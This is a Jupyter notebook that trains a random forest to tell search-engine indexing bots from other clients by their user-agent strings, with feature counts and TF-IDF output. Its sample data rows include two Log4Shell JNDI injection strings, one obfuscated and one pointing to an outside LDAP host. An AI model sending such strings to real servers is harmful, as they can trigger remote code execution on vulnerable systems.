In [4]:
#import libraries
import pandas as pd
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn import model_selection, preprocessing, linear_model, naive_bayes, metrics, svm
from sklearn import ensemble
from keras import layers, models, optimizers
import numpy
import re

trainDF = pd.read_csv('data/indexing_bots.csv', sep='\t')
trainDF

Unnamed: 0,count,user_agent,is_indexing_bot
0,1,${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}$...,0
1,1,${jndi:ldap://121.140.99.236:1389/Exploit},0
2,1,1st ZipCommander (Net) - http://www.zipcommand...,0
3,1,AccompanyBot,0
4,1,AccompanyBot,0
...,...,...,...
174507,1,WhatsApp/2.2147.16 N,0
174508,1,WhatsApp/2.22.1.10 A,0
174509,2,WordPress/5.8.2; https://autorunsclothing.fisk...,0
174510,1,XenForo/2.x (https://www.mtb-news.de/forum),0


In [5]:
# analyze dataset
# check number of words in each review
train = trainDF.copy()
train['word_count'] = train['user_agent'].apply(lambda x: len(str(x).split(" ")))
print(train[['user_agent','word_count']].head())
print(train['word_count'].max())
print(train['word_count'].min())
print(train['word_count'].mean())

                                          user_agent  word_count
0  ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}$...           1
1         ${jndi:ldap://121.140.99.236:1389/Exploit}           1
2  1st ZipCommander (Net) - http://www.zipcommand...           5
3                                       AccompanyBot           1
4                                       AccompanyBot           1
37
1
13.732912349867059


In [6]:
# check character number
train['char_count'] = train['user_agent'].str.len() ## this also includes spaces
train[['user_agent','char_count']].head()

Unnamed: 0,user_agent,char_count
0,${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}$...,245
1,${jndi:ldap://121.140.99.236:1389/Exploit},42
2,1st ZipCommander (Net) - http://www.zipcommand...,53
3,AccompanyBot,12
4,AccompanyBot,12


In [7]:
train['user_agent'] = train['user_agent'].apply(lambda x: str(x))
# check average word length
def avg_word(sentence):
  words = sentence.split()
  return (sum(len(word) for word in words)/len(words))

train['avg_word'] = train['user_agent'].apply(lambda x: avg_word(x))
train[['user_agent','avg_word']].head()

Unnamed: 0,user_agent,avg_word
0,${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}$...,245.0
1,${jndi:ldap://121.140.99.236:1389/Exploit},42.0
2,1st ZipCommander (Net) - http://www.zipcommand...,9.8
3,AccompanyBot,12.0
4,AccompanyBot,12.0


In [8]:
# check numeric characters number
train['numerics'] = train['user_agent'].apply(lambda x: len([x for x in x.split(' ') if x.isnumeric()]))
print(train[['user_agent','numerics']].head())
print(train['numerics'].max())
print(train['numerics'].min())
print(train['numerics'].mean())

                                          user_agent  numerics
0  ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}$...         0
1         ${jndi:ldap://121.140.99.236:1389/Exploit}         0
2  1st ZipCommander (Net) - http://www.zipcommand...         0
3                                       AccompanyBot         0
4                                       AccompanyBot         0
2
0
0.008016640689465481


In [9]:
# check number of upper case letters
train['upper'] = train['user_agent'].apply(lambda x: len([x for x in x.split() if x.isupper()]))
print(train[['user_agent','upper']].head())
print(train['upper'].max())
print(train['upper'].min())
print(train['upper'].mean())

                                          user_agent  upper
0  ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}$...      0
1         ${jndi:ldap://121.140.99.236:1389/Exploit}      0
2  1st ZipCommander (Net) - http://www.zipcommand...      0
3                                       AccompanyBot      0
4                                       AccompanyBot      0
14
0
3.191717475016045


In [10]:
# check number of punctuation characters
train['punctuation'] = train['user_agent'].apply(lambda x: len(re.findall(r'[\.,?!;:]', x)))
print(train['punctuation'].max())
print(train['punctuation'].min())
print(train['punctuation'].mean())

33
0
8.58726047492436


In [11]:
# normalize text
# apply lowercase
trainDFRaw = trainDF.copy()
trainDF['user_agent'] = trainDF['user_agent'].apply(lambda x: " ".join(x.lower() for x in str(x).split()))
trainDF['user_agent'].head()

0    ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}$...
1           ${jndi:ldap://121.140.99.236:1389/exploit}
2    1st zipcommander (net) - http://www.zipcommand...
3                                         accompanybot
4                                         accompanybot
Name: user_agent, dtype: object

In [12]:
# remove special characters
trainDF['user_agent'] = trainDF['user_agent'].str.replace('[^\w\s]',' ')
trainDF['user_agent'].head()

  trainDF['user_agent'] = trainDF['user_agent'].str.replace('[^\w\s]',' ')
  trainDF['user_agent'] = trainDF['user_agent'].str.replace('[^\w\s]',' ')


0           j      n      d      i       l      d  ...
1             jndi ldap   121 140 99 236 1389 exploit 
2    1st zipcommander  net    http   www zipcommand...
3                                         accompanybot
4                                         accompanybot
Name: user_agent, dtype: object

In [13]:
# prepare model
# split data to train and test set
train_x, valid_x, train_y, valid_y = model_selection.train_test_split(trainDF['user_agent'], trainDF['is_indexing_bot'])

# encode categorical values
encoder = preprocessing.LabelEncoder()
train_y = encoder.fit_transform(train_y)
valid_y = encoder.fit_transform(valid_y)

print(valid_y)

[0 0 0 ... 0 0 0]


In [14]:
train_x[100]


'chimeunfurlagent'

In [15]:
# encode text to TF-IDF numeric vectors
tfidf_vect = TfidfVectorizer(analyzer='word', token_pattern=r'\w{1,}', max_features=5000)
tfidf_vect.fit(trainDF['user_agent'])
xtrain_tfidf =  tfidf_vect.transform(train_x)
xvalid_tfidf =  tfidf_vect.transform(valid_x)


In [16]:
print(xtrain_tfidf[100])
len(tfidf_vect.get_feature_names_out())

  (0, 0)	0.15564567536064763
  (0, 58)	0.18921812201079702
  (0, 820)	0.2855150443950242
  (0, 966)	0.1626361263245601
  (0, 989)	0.07792145601398631
  (0, 1027)	0.2854386353727038
  (0, 1233)	0.31573752397694616
  (0, 1249)	0.16247202180255116
  (0, 1594)	0.15774554107169272
  (0, 1613)	0.08607732539011413
  (0, 1805)	0.14267906849158749
  (0, 2073)	0.5697893549787024
  (0, 2364)	0.07832706654068454
  (0, 2722)	0.08607881399190298
  (0, 2802)	0.08600243610091232
  (0, 2807)	0.15894331357600497
  (0, 2831)	0.4126485643251765
  (0, 2957)	0.10516403586131276
  (0, 2967)	0.07793887231409004
  (0, 3371)	0.08625665989492019


3871

In [17]:
# universal method for model training

def train_model(classifier, feature_vector_train, label, feature_vector_valid, is_neural_net=False):
    # train model
    classifier.fit(feature_vector_train, label)
    
    # generate predictions for test set
    predictions = classifier.predict(feature_vector_valid)
    
    if is_neural_net:
        predictions = predictions.argmax(axis=-1)
    
    # evaluate model
    scores = list(metrics.precision_recall_fscore_support(predictions, valid_y))
    score_vals = [
        scores[0][0],
        scores[1][0],
        scores[2][0]
    ]
    score_vals.append(metrics.accuracy_score(predictions, valid_y))
    return score_vals

In [18]:
# MODEL - Random Forest Tree 
import time

ut = time.time()
print(len(train_x))
accuracy = train_model(ensemble.RandomForestClassifier(), xtrain_tfidf, train_y, xvalid_tfidf)
accuracy_compare = accuracy
print ("RF, WordLevel TF-IDF: ", accuracy)
print(time.time() - ut)

130884
RF, WordLevel TF-IDF:  [1.0, 0.9999770631680353, 0.9999885314524916, 0.9999770789401302]
5.616567134857178
